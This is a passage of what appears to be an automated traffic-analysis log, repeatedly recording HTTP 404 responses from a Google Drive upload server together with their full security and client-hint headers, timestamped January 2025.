https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT369MaVz7SBWW5aXPsFnbCZnmQdtHAOgoCTmGUNYQfg9o7bHeHXCgJ1M6nT8dQiAzhContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:32 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-4rdDBkOrW1OOWULK-x3XWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQkmAeXebdqmTqi1yeU223BM4MhkOaYxpsVASarLDNC5tgdIZ_60Kp25UC08eSzoWHbContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:34 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-M4JJoc1_47xTWYvAu-RR0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ESL8IBcz6NFrGm2s2pPvteangT7aX8Xgg8YnHLKm3TYyFaCcA00icFnlS0dErSQsauGXYbJoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:37 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Bg-1oG4AlEhkaFS1cJdBFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6PgHZhhCKPNxdk4ClD9AhID3JFGwhxeUAxtV7mFi5rjTzbIAkuvZDjbUqNwFm3ca1ZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-gHANx6DOk3FawaEJdlU1wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT1onx0nu54vQZxvHlZa-c5JGJbZmkyIJ7uSX93FbYGUarmBgRJeXKLbIVZ6PIexQqMMJIjtowContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:41 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-t2NhpWlHafpLxdxe91oQwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4g6KdTmPccLuYOMM569hG1DZJe1bAm1m9iXCBxkn0C8tuc8z6ldQ9gvVohXu8XWciqsQ6iTrsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-go566t6gLcqa_WBfPSl4AA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC53BIWLhSH4CRJxxJ4Hbf_NKfjSbCjhipd0Ah-OyED6klhWJkMu_7HckAXIDX4XElktzP_BSIkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:46 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-gSRM6WAvQwqHabIx-Bk-lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSYBtUHanGvGgUqGRx6T2mX52O4e885EmUmk4qiqieOZsym2WnS6wE_PMrFc71F9cnSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:49 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-XA6CujBmxbACi7hIrnJZqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6crM6FOApL-R-Y65smVto2_5SBvTfa13w3CwnHoIA_3kNbi7sJvhnVGC19Gy-Hb2oCRtcZ4nkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:51 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-59TWLRx8l9JYw0Xroa2K2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC42INTQcEMOkPrixOQ1TpM2Q_-W7xSQL9l_8_oNYOQkeKU8tftaJ_OhO9fnoeZBSfRTP0CnQYIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:53 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-JElhuqk_mMgbZIpgf4Gk5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4-Ffjb-ClqqjuqL-ctkK8AL2hXjDna6vXr_CNlT-URa_xi9qLsdfsZNk1W62B93ukubeQN7yUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:55 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-W002gmwOkydt7E2wVEkS3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR6qA1sjjLWHzUZmSgtHyxUeISbuFVdvKDyrpHt_EdQUc6cpAbYJdZg6V6V86vfC7jyZDvzEpEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:39:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-R34HUDyU8rT4i4KNzKOzYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR38k9ekxwDxSdsYR-3m1aY1A_jx5k62kG5pmCTOjq09a_O65wabBT-bFvZkMr9RjdRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:00 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-VAEdNDbi0Lfe6pIvhAfwKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQqfCi4eVRg4oQApnPAvqVklbAgG2t8gSvdf3zcYeoTw_X6y9-27f3x9sn3_2JzfUjyXeaX2zUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:02 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-wKWt0sHf383pA4KBnIxx2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQXAhPWR9XxZT7Zf1avqSYLdKrJi9eWhWatEqjOHtg3NYPwz9SiLzN5HZ_Ofitno5DVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:40:05 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-KyS7PoPuWwSleTI2YPIWJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 